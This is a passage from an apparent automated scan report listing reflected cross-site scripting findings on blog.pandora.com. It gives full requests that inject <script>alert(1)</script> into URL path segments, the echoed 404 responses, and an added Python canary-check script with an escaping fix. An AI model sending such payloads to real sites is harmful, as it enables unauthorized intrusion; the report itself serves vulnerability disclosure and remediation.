Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)</script>c6bfcd2ec61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)</script>8fd48e0eb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)</script>667affef35b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)</script>bb3bcc17fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)</script>050c2fa5c54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)</script>f718eac7bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)</script>5b51d9c237f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)</script>98cd7486264 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)</script>3cadd9a1ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)</script>c653de1c429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)</script>5818dec138e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)</script>65ebaa61d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>50186e33060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)</script>4beca333580 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)</script>380f8df8738 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ was not found on this server.</p>
...[SNIP]...
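Every finding in this run has the same sink: the server's 404 error document copies the requested URL between tags without HTML-encoding it, so each path segment and any query-parameter name reaches it. The following script is an added example, not part of the scan report or of the target's code. It reproduces the canary check behind these findings against a simulated error document that echoes the raw request target (the body shape is constructed to match the report's 404 responses), shows the same document with HTML escaping applied, and classifies how the probe comes back. It also covers one caveat the report does not state: the scanner sent `<` and `>` in the path verbatim; a client that percent-encodes them, with a server that echoes the encoded form, yields a harmless reflection, and the classifier reports that case separately. The handler, helper names and the reuse of the report's `dc6a7`/`380f8df8738` markers as sample data are assumptions made here.

```python
"""
Added example (not from the scan report): canary-based reflection check
against a simulated 404 error document, vulnerable and hardened.
"""
import html
import re
from urllib.parse import quote, unquote

# Probe and canary wrapper shaped like the report's payloads
# (e.g. dc6a7<script>alert(1)</script>380f8df8738). Marker values are
# reused from the report's first finding purely as sample data.
PROBE = "<script>alert(1)</script>"
CANARY = ("dc6a7", "380f8df8738")


def render_404(request_target: str) -> str:
    """Constructed error document matching the body shape in the report.
    It interpolates request_target as given; callers decide whether to
    escape it first."""
    return (
        '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
        "<html><head>\n<title>404 Not Found</title>\n</head><body>\n"
        "<h1>Not Found</h1>\n"
        f"<p>The requested URL {request_target} was not found on this server.</p>\n"
        "</body></html>\n"
    )


def vulnerable_404(request_target: str) -> str:
    """Echoes the raw target between tags: the behaviour the report shows."""
    return render_404(request_target)


def hardened_404(request_target: str) -> str:
    """Fix: HTML-escape the target before it lands between tags."""
    return render_404(html.escape(request_target, quote=True))


def inject_into_segment(path: str, index: int, marker: str) -> str:
    """Append marker to the index-th (1-based) non-empty path segment,
    producing targets like /pandora/archives/washington-dcMARKER/ ."""
    parts = path.split("/")
    seg_positions = [i for i, p in enumerate(parts) if p]
    if not 1 <= index <= len(seg_positions):
        raise IndexError(f"{path!r} has {len(seg_positions)} segments")
    pos = seg_positions[index - 1]
    parts[pos] += marker
    return "/".join(parts)


def inject_as_param_name(path: str, marker: str) -> str:
    """Supply marker as the name of an otherwise unused query parameter."""
    return f"{path}?{marker}=1"


def classify_reflection(body: str, probe: str = PROBE, canary=CANARY) -> str:
    """Locate the text between the canary markers and report how the
    probe came back: 'raw' (exploitable between tags), 'encoded'
    (HTML-escaped), 'percent-encoded' (client sent %3C... and the server
    echoed it as such), 'modified' (something else) or 'none'."""
    prefix, suffix = canary
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "none"
    middle = m.group(1)
    if middle == probe:
        return "raw"
    if html.unescape(middle) == probe:
        return "encoded"
    if unquote(middle) == probe:
        return "percent-encoded"
    return "modified"


def scan(path: str, handler, encode_like_browser: bool = False) -> dict:
    """Probe every path segment plus a query-parameter name, the way the
    findings for 'REST URL parameter 1..5' and 'name of an arbitrarily
    supplied request parameter' were produced. encode_like_browser
    percent-encodes the target first, as a client that does not pass
    '<' and '>' through verbatim would."""
    prefix, suffix = CANARY
    marker = prefix + PROBE + suffix
    nsegs = len([p for p in path.split("/") if p])
    targets = {f"segment{i}": inject_into_segment(path, i, marker)
               for i in range(1, nsegs + 1)}
    targets["param-name"] = inject_as_param_name(path, marker)
    results = {}
    for name, target in targets.items():
        if encode_like_browser:
            target = quote(target, safe="/?=")
        results[name] = classify_reflection(handler(target))
    return results


if __name__ == "__main__":
    path = "/pandora/archives/washington-dc/"
    print("vulnerable:", scan(path, vulnerable_404))
    print("hardened:  ", scan(path, hardened_404))
    print("browser-encoded, vulnerable:", scan(path, vulnerable_404, True))
```

Against the vulnerable handler every position classifies as `raw`, which is what the repeated parameter 1..5 findings amount to; against the hardened handler every position is `encoded`. Whether the percent-encoded path is decoded before being echoed is something to verify on the real server before rating the issue, since that decides whether a victim's browser can deliver the payload.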
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)</script>a835002da8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)</script>9b5600a0222 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
